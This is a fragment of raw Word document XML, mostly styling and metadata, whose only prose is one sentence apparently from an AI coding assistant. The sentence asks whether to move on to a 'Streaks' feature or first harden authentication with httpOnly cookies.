      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Want me to note this as something to return to, and move on to </w:t>
      </w:r>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Streaks</w:t>
      </w:r>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> now? Or do you want to harden </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>auth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>httpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookies right now before continuing?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B56F2" w:rsidRPr="004B628D" w:rsidRDefault="002B56F2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="002B56F2" w:rsidRPr="004B6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776"/>
    <w:rsid w:val="00153776"/>
    <w:rsid w:val="002B56F2"/>
    <w:rsid w:val="004B628D"/>
    <w:rsid w:val="008D68CB"/>
    <w:rsid w:val="00EE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2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D6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68C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8D6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8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8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68C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2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whitespace-pre-wrap">
    <w:name w:val="whitespace-pre-wrap"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="004B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4B628D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="absolute">
    <w:name w:val="absolute"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004B628D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="inline-flex">
    <w:name w:val="inline-flex"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004B628D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="transition-all">
    <w:name w:val="transition-all"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004B628D"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="004B628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2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D6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68C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8D6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8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8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68C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2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whitespace-pre-wrap">
    <w:name w:val="whitespace-pre-wrap"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="004B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4B628D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="absolute">
    <w:name w:val="absolute"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004B628D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="inline-flex">
    <w:name w:val="inline-flex"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004B628D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="transition-all">
    <w:name w:val="transition-all"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004B628D"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="004B62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3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8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66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1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44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942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8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4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32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7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9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2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90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56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57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4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40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4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073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30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15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01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236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55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33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55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9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2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1500</Words>
  <Characters>8552</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>71</Lines>
  <Paragraphs>20</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>HP</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>10032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2026-06-20T10:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-20T10:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>